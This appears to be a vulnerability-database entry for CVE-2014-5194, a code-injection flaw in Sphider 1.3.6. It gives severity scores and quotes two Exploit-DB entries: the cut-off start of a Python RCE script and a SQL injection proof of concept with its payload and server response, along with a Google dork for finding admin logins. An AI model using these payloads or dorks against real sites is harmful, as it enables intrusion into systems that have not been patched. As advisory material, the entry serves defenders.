CVE-2014-5194
Published: 2014-08-07
Priority: P3 · 41 · medium · 6.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS: 4.21% (89.7th percentile)
Static code injection vulnerability in admin/admin.php in Sphider 1.3.6 allows remote authenticated users to inject arbitrary PHP code into settings/conf.php via the _word_upper_bound parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sphider | sphider | — | — |
No detection rules found.
Exploit-DB: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
exploitdb · 2020-10-27 · CVSS 6.5 · CVE-2014-5194 [MEDIUM]
---
# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
# Google Dork: intitle:"Sphider Admin Login"
# Date: 2014-07-28
# Exploit Author: Gurkirat Singh
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v1.3.6
# Tested on: Windows and Linux
# CVE : CVE-2014-5194
# Proof of Concept: https://www.exploit-db.com/exploits/34189
from argparse import ArgumentParser, RawTextHelpFormatter
from huepy import *
import string
import random
from bs4 import BeautifulSoup, Tag
from requests import Session
from randua import generate as randua
_F = "".join(random.choices(string.ascii_letters, k=13))
parser = ArgumentParser(description="Explo
Exploit-DB: Sphider Search Engine 1.3.6 - Multiple Vulnerabilities
exploitdb · 2014-07-28 · CVE-2014-5194
---
# Exploit Title: Sphider 1.3.6 or later SQL Injection
# Google Dork: intitle:"Sphider Admin Login"
# Date: 1 July 2014
# Exploit Author: Mike Manzotti
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v 1.3.6
Description:
The web application is vulnerable to SQLi. Once a website has been indexed with Sphider, an attacker can inject SQL under Sites -> Browser pages-> filter option.
Proof of Concept:
Response: POST: /admin/admin.php
per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21
Response:
5.5.35-0+wheezy1
# Exploit Title: Sphider 1.3.6 or later PHP Injection
Description:
An authenticated user can inject P
No writeups or analysis indexed.
Published: 2014-08-07